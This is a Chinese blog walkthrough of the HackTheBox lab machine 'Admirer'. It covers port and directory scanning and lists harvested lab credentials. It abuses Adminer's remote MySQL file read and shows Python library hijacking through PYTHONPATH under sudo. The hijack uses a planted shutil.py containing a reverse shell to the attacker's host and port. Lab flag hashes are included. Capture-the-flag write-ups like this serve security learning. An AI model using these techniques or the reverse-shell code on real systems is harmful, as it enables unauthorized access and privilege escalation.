[Meachines] [Easy] Admirer Adminer远程Mysql反向+Python三方库函数劫持权限提升

于 2024-07-27 18:04:22 发布
阅读量454 收藏 5
点赞数 5
分类专栏: HackTheBox 文章标签: mysql python 数据库
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140738952
版权

信息收集

IP AddressOpening Ports
10.10.10.187TCP:21,22,80

$ nmap -p- 10.10.10.187 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-title: Admirer
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
UsernamePasswordType
waldo.11Ezy]m27}OREc$Bank
w.cooper@admirer.htbfgJr6q#S\W:$PMail
ftpuser%n?4Wz}R$tTF7FTP
adminw0rdpr3ss01!WordPress
waldo]F7jLHw:*G>UPrTo}~A"d6bDB:admirerdb
waldoWh3r3_1s_w4ld0?DB
waldo&<h5b~yK3F#{PaPB&dA}{H>SSH

目录爆破

http://10.10.10.187/admin-dir/

image.png

$ $ gobuster dir -u "http://10.10.10.187/admin-dir/" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x .txt,.php

image-2.png

http://10.10.10.187/admin-dir/credentials.txt

image-1.png

username:ftpuser
password:%n?4Wz}R$tTF7

FTP

$ ftp 10.10.10.187

ftp> get html.tar.gz

ftp> get dump.sql

image-3.png

$ tar -zxvf html.tar.gz

敏感信息

$ grep -iR password ./

image-4.png

image-5.png

username:waldo
password:]F7jLHw:*G>UPrTo}~A"d6b
password:Wh3r3_1s_w4ld0?

$ gobuster dir -u "http://10.10.10.187/utility-scripts/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50

image-6.png

Adminer远程Mysql反向文件读取

$ sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

image-7.png

$ sudo service mysql start
$ sudo mysql -uroot -p

MariaDB [(none)]> CREATE DATABASE H4CK13;
MariaDB [(none)]> CREATE USER 'admin'@'10.10.10.187' IDENTIFIED BY 'TEST';

MariaDB [(none)]> GRANT ALL ON H4CK13.* TO 'admin'@'10.10.10.187';

MariaDB [(none)]> FLUSH PRIVILEGES;

MariaDB [(none)]> CREATE TABLE TEST_LOAD(OUTPUT TEXT(4096));

http://10.10.10.187/utility-scripts/adminer.php

image-8.png

image-9.png

image-10.png

由于限制路径,仅允许读取/var/www/html目录下文件

image-11.png

http://10.10.10.187/utility-scripts//adminer.php?server=10.10.16.5&username=admin&db=H4CK13&sql=

LOAD DATA LOCAL INFILE '/var/www/html/index.php' INTO TABLE TEST_LOAD FIELDS TERMINATED BY "\n"

image-12.png

select * from TEST_LOAD

image-13.png

username:waldo
password:&<h5b~yK3F#{PaPB&dA}{H>

image-14.png

User.txt 截屏

image-15.png

User.txt 内容

64332fee15a06c428fa01b4185bdd695

权限提升

$ sudo -l

image-16.png

image-17.png

image-18.png

通过劫持shutil来获取反向shell

/dev/shm 是一个在 Linux 和 Unix 系统上常见的临时文件系统目录,代表共享内存(shared memory)。它是由 Linux 内核中的 tmpfs 文件系统实现的。使用 /dev/shm 可以快速地在进程之间共享数据,因为它使用的是内存而不是磁盘,因此读写速度非常快。

$ vi /dev/shm/shutil.py

# shutil.py
import socket,subprocess,os
import pty;
def make_archive(a,b,c):
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect(("10.10.16.5",10032))
  os.dup2(s.fileno(),0)
  os.dup2(s.fileno(),1)
  os.dup2(s.fileno(),2)
  pty.spawn("/bin/sh")

$ sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh

> 6

将python环境设置在/dev/shm目录,这样执行backup.py的时候将从/dev/shm导入包

image-19.png

Root.txt 截屏

image-20.png

Root.txt 内容

3ef473946f9b258b657cdbefbde60ef8

Мартин.
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-admireradminer渗透 & python-library-hijacking)
冬萍子癸水
01-23 645
1、扫描 端口很常规,21进去看看有无价值文件,22可能有登录,80信息搜集 C:\root> nmap -A 10.10.10.187 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 13:28 CST Nmap scan report for 10.10.10.187 (10.10.10.187) Host is up (0.41s latency). Not shown: 997 closed ports PORT STATE SE
centos adminer.php,在Linux下安装和使用Adminer,用它管理MySQL/MariaDB和PostgreSQL
weixin_35844236的博客
03-23 721
本文介绍如何在Linux操作系统中安装和使用Adminer,使用它可以管理MySQL、MariaDB和PostgreSQL数据库服务器。简介Admirer是一个免费且开源的数据库管理系统,打包在一个PHP文件中,Admirer支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、SimpleDB、Elasticsearch、MongoDB、Firebird...
Python的基本数据类型
qq_38914978的博客
08-19 107
1、Number(数字) 1、Python可以同时为多个变量赋值,如a,b = 1,2。 2、一个变量可以通过赋值指向不同类型的对象。 3、数值的除法宝行两个运算符,/返回一个浮点数,//返回一个整数,表示取整。 4、在混合计算时,Python会把整型转换为浮点数。 2、String(字符串) 1、反斜杠\可以用来转义,使用r可以让反斜杠不发生转义。 2、字符串可以用+运算符连接在一起,用*...
HackTheBox::Admirer
aya3t的博客
10-14 801
HackTheBox::Admirer
Python3自然语言(NLTK)——语言大数据
weixin_30564785的博客
04-30 1753
NLTK 这是一个处理文本的python库,我们知道文字性的知识可是拥有非常庞大的数据量,故而这属于大数据系列。 本文只是浅尝辄止,目前本人并未涉及这块知识,只是偶尔好奇,才写本文。 从NLTK中的book模块中,载入所有条目 book 模块包含所有数据 from nltk.book import * *** Introductory Examples for the NLTK Bo...
HTB walkthrough -- Admirer
sinat_36853972的博客
07-14 541
HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-dir 用wfuzz对这个文件进行扫描 得到contacts.txt 和 credentials.txt 看到有一个ftp用户,尝试ftp登录 登录成功,将dump.sql和html.tar.gz文件下载到本地 html.tar.gz解压后,分别有以下内容 index.php utility-scr
mysql基础知识
qq_38914978的博客
03-26 165
RDBMS:关系型数据库管理系统 RDBMS相关术语: 列:一列包含了相同类型的数据; 行:一行包含了一组相关联的数据; 冗余:存储两倍数据。降低了数据库的性能,但提高了数据安全性; 主键:主键是唯一的。一张表中只能有一个主键,可以用作索引; 外键:用于关联两个表; 复合键:将多个列作为一个索引键,一般用于组合索引; 索引:是对数据库表中的一列或多列的值进行排序的一种结构; MySQL是一个关...
Milena and Admirer Codeforces Round 910 (Div. 2) B
ashbringer233的博客
12-13 484
我们从n-1遍历到1,如果当前a[i]>a[i+1],那么这个数就应该分割cnt=a[i]/a[i+1]次,平分出来的数就是a[i]/(cnt+1),特殊的是如果能a[i]能整除a[i+1],那么整除次数要-1,当遇到a[i]=1时,再往后的数就都必须分割成1了。思路:因为要让数组变成非递减的,所以对于某个a[i],如果其>a[i+1],那么就要对其进行操作,无论最后进行几次操作,都应该满足,分出来的这些数是非递减的,最左边的数要>=再左边的一个数,最右边的数要
Python函数
qq_38914978的博客
08-19 84
1、参数 以下是调用函数时可使用的正式参数类型: 必需参数 关键字参数 默认参数 不定长参数 1、参数前+ * 的参数会以元组(tuple)的形式导入,存放所有未命名的变量参数 2、参数前+ ** 的参数会以字典(Dictionary)的形式导入,存放所有未命名的变量参数 3、声明函数时,参数中星号 * 可以单独出现,例如: def f(x,y,*,z): return x+y+z ...
adminer_admirer_
10-02
标题“adminer_admirer_”可能指的是一个与Adminer相关的项目或软件的定制版本,其中包含了“admirer”这一特定主题或风格。Adminer是一个开源的数据库管理工具,它允许用户通过Web界面轻松地执行数据库管理和操作,...
Charmdate ChatOS admirer email sender-crx插件
04-02
语言:русский 创建此扩展,以便于... ...将窗口放在该部分的显示器中,其中它使用简单的工具移动浏览器窗口方便。您可以在前三天内完全免费使用此延期。为此,没有什么需要完成。只需设置扩展并继续工作。...
Charmdate ChatOS崇拜者电子邮件发件人「Charmdate ChatOS admirer email sender」-crx插件
03-08
您可以快速轻松地配置... ...您可以快速轻松地设置简报,并等待系统自动为您找到男性。 将窗口放置在显示器方便的位置,使用简单的工具移动浏览器窗口。 您可以在前三天免费使用此扩展程序。为此,你不必做任何事情。...
AsiaMe ChatOS崇拜者电子邮件发件人「AsiaMe ChatOS admirer email sender」-crx插件
03-09
您可以轻松设置搜索工具,并等待... ... 您可以轻松设置搜索工具,并等待,直到找到你的人。 另外,您可以管理您的窗口,以更有效地使用屏幕。 历史,黑名单和其他功能取决于你。...您可以免费使用这个扩展名前三天。...
admirer:[WIP]一个命令行实用程序,用于在Spotify和Last.fm之间同步喜欢的歌曲
03-25
爱慕者 一个命令行实用程序,用于在Spotify和Last.fm之间同步喜欢的歌曲。 进行中:目前尚不能完全正常运行,并且缺少文档。 执照 Dietrich Moerman版权所有2020。 根据条款发行。
DBeaver Ultimate 22.1.0 连接数据库(MySQL+Mongo+Clickhouse)
我不懂,可我不傻
07-24 872
继续书接上文Docker Compose V2 安装常用数据库MySQL+Mongo,部署安装好之后我本来是找了一个web端的在线连接数据库的工具,但是使用过程中并不丝滑,最终还是选择了使用 DBeaver ,然后发现 mongo 还需要许可,又折腾整理了半下午,终于大功告成。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2502
MySQL基线检查,基线配置,安全加固
MySQL深度分页问题深度解析与解决方案
weixin_42545951的博客
07-24 658
在处理包含数百万条记录的大型数据表时,使用MySQL的`LIMIT`进行分页查询是一种常见的做法。然而,当请求的数据位于结果集的深层时,即所谓的“深度分页”,查询性能会急剧下降。本文将深入探讨深度分页问题的原因,并提供几种有效的解决方案。
tensorboard add_text() 停止自动为尖括号标记添加配对的结束括号</>
最新发布
diqiudq的博客
07-24 282
调用tensorboard的add_text()记录文本信息时,如果文本中含有含尖括号的标记,就会被自动识别为html标记,因此tensorboard会自动生成对应的带斜杠的结束标记。例如要记录的文本是 abc,在tensorboard中就会显示为abc,给调试带来麻烦。应该使用正则表达式为尖括号转义。
你现在是一个资深英国足球迷,现在按照英国人的习惯和标准,撰写一份电子邮件给英国的阿森纳足球俱乐部。内容是祝愿他们能够在本赛季夺得联赛冠军。
05-12
Subject: Best Wishes for Arsenal FC to Win the League This Season Dear Arsenal Football Club, I hope this email finds you well. As a proud and passionate football fan from the United Kingdom, I wanted to take a moment to express my sincere support for your team this season. As a long-time admirer of Arsenal FC, I have watched with great interest and excitement as you have battled your way through the league this year. I have been impressed by your team's skill, determination, and unwavering commitment to excellence both on and off the field. With the season drawing to a close, I wanted to take this opportunity to offer my heartfelt best wishes for your team to emerge as the champions of the league this year. I believe that your team has what it takes to go all the way, and I have every confidence that you will be able to accomplish this remarkable feat. I know that the road ahead will not be easy, and that you will face many challenges and obstacles along the way. But I also know that you have the talent, the drive, and the passion to overcome any obstacle and achieve the success that you so richly deserve. So please accept my best wishes and my sincere support as you strive towards the ultimate goal of winning the league this season. I will be cheering you on every step of the way, and I look forward to watching your team achieve great things in the coming weeks and months. Sincerely, [Your Name]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值